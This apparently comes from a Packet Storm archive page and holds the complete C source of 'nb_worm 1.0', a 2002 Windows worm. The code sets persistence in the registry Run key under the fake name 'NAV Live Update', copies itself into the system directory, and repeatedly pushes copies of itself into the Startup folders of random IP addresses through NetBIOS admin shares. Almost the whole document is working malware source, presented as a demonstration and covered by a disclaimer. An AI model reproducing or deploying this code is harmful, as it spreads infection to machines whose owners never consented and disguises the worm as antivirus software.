Netbios Worm v1.0 is a simple program which shows how a worm can spread across netbios shares.
5537a2f48a21330e64b052695d14ffa0b6b83bfeb27f1a5920b8dbc6e6617e57/*
nb_worm 1.0
coded by: r-22
date: 12.05.02
e-mail: admin@manshadow.org
www: http://www.manshadow.org/
this is just a simple program to show
how to make a worm that spreads across
through netbios shares, this is
actually a chopped version of 4x10m
an irc bot i am working on currently
this code is not meant to be used
in a malicious manner and the writer
of this code is not to be held responsible
for any damage that is a result of the
use of this code
shouts to:
strychnine, uniTy, rabbit, m03
cThReE, aol secrets and #niz2k
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#define APP_VERSION "nb_worm 1.0"
/* prototypes */
void InstallReg();
void MoveLocal();
void MoveNetBIOS();
void GetRandIP(const char *ip_addr);
/* main program code */
int main(int argc, char *argv[])
{
InstallReg();
MoveLocal();
while (1)
{
MoveNetBIOS();
Sleep(2000);
}
return 0;
}
/* install registry keys */
void InstallReg()
{
HKEY reg_key;
char reg_val[16] = "NAV Live Update";
char app_name[MAX_PATH];
GetModuleFileName(GetModuleHandle(NULL), app_name, sizeof(app_name));
RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, ®_key, NULL);
RegSetValueEx(reg_key, reg_val, 0, REG_SZ, (const unsigned char *)&app_name, sizeof(app_name) +1 );
RegCloseKey(reg_key);
}
/* change bot location to %SystemRoot% */
void MoveLocal()
{
char sysdir[MAX_PATH];
char app_name[MAX_PATH];
char base_name[MAX_PATH];
char *file_name;
GetModuleFileName(GetModuleHandle(NULL), app_name, sizeof(app_name));
GetSystemDirectory(sysdir, sizeof(sysdir));
file_name = strrchr(app_name, '\\');
if (file_name != NULL)
{
strcpy(base_name, sysdir);
strcat(base_name, file_name);
CopyFile(app_name, base_name, 0);
}
}
/* copy bot to startup directory of remote machine */
void MoveNetBIOS()
{
char netdir[MAX_PATH];
char app_name[MAX_PATH];
char base_name[MAX_PATH];
char *file_name;
char ip_addr[16];
GetModuleFileName(GetModuleHandle(NULL), app_name, sizeof(app_name));
/* Windows 2000 and Windows XP startup directory */
strcpy(netdir, "\\\\");
GetRandIP(ip_addr);
strcat(netdir, ip_addr);
strcat(netdir, "\\C$\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup");
file_name = strrchr(app_name, '\\');
if (file_name != NULL)
{
strcpy(base_name, netdir);
strcat(base_name, file_name);
CopyFile(app_name, base_name, 0);
}
/* Windows 95/98 and Windows ME startup directory */
strcpy(netdir, "\\\\");
GetRandIP(ip_addr);
strcat(netdir, ip_addr);
strcat(netdir, "\\C\\WINDOWS\\Start Menu\\Programs\\Startup"); /* do not use C$ */
file_name = strrchr(app_name, '\\');
if (file_name != NULL)
{
strcpy(base_name, netdir);
strcat(base_name, file_name);
CopyFile(app_name, base_name, 0);
}
/* Windows NT startup directory */
strcpy(netdir, "\\\\");
GetRandIP(ip_addr);
strcat(netdir, ip_addr);
strcat(netdir, "\\C$\\WINNT\\All Users\\Start Menu\\Programs\\Startup");
file_name = strrchr(app_name, '\\');
if (file_name != NULL)
{
strcpy(base_name, netdir);
strcat(base_name, file_name);
CopyFile(app_name, base_name, 0);
}
}
/* return a random ip from 1.1.1.1 to 254.254.254.254 */
void GetRandIP(const char *ip_addr)
{
char ip_addr_a[4];
char ip_addr_b[4];
char ip_addr_c[4];
char ip_addr_d[4];
srand(time(NULL));
itoa(rand() % 253 + 1, ip_addr_a, 10);
itoa(rand() % 253 + 1, ip_addr_b, 10);
itoa(rand() % 253 + 1, ip_addr_c, 10);
itoa(rand() % 253 + 1, ip_addr_d, 10);
strcpy((char *)ip_addr, ip_addr_a);
strcat((char *)ip_addr, ".");
strcat((char *)ip_addr, ip_addr_b);
strcat((char *)ip_addr, ".");
strcat((char *)ip_addr, ip_addr_c);
strcat((char *)ip_addr, ".");
strcat((char *)ip_addr, ip_addr_d);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed